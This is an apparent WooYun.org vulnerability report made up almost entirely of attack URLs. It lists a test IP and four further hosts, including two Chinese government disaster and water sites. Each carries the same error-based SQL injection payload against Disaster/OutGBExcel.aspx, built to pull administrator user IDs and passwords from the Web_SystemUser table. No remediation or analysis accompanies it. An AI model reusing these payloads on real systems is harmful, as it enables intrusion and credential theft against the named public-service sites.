WooYun.org

测试案例：
http://218.108.53.214:3050
获取管理员密码:
http://218.108.53.214:3050/Disaster/OutGBExcel.aspx?tabnm=a&qtype=b&queryvalue=1%27%2b(select+1+where+1=convert(int,(select+top+1+UserID%2b%27|%27%2bUserPwd+from+strongmain.dbo.Web_SystemUser)))%2b%27



其他案例：
(1) http://shzh.wlfx.gov.cn
http://shzh.wlfx.gov.cn/Disaster/OutGBExcel.aspx?tabnm=a&qtype=b&queryvalue=1%27%2b(select+1+where+1=convert(int,(select+top+1+UserID%2b%27|%27%2bUserPwd+from+strongmain.dbo.Web_SystemUser)))%2b%27




(2) http://218.86.6.48:3505
http://218.86.6.48:3505/Disaster/OutGBExcel.aspx?tabnm=a&qtype=b&queryvalue=1%27%2b(select+1+where+1=convert(int,(select+top+1+UserID%2b%27|%27%2bUserPwd+from+strongmain.dbo.Web_SystemUser)))%2b%27




(3)http://222.78.185.230:3505/
http://222.78.185.230:3505/Disaster/OutGBExcel.aspx?tabnm=a&qtype=b&queryvalue=1%27%2b(select+1+where+1=convert(int,(select+top+1+UserID%2b%27|%27%2bUserPwd+from+strongmain.dbo.Web_SystemUser)))%2b%27




(4)http://yj.yywater.gov.cn
http://yj.yywater.gov.cn/Disaster/OutGBExcel.aspx?tabnm=a&qtype=b&queryvalue=1%27%2b(select+1+where+1=convert(int,(select+top+1+UserID%2b%27|%27%2bUserPwd+from+strongmain.dbo.Web_SystemUser)))%2b%27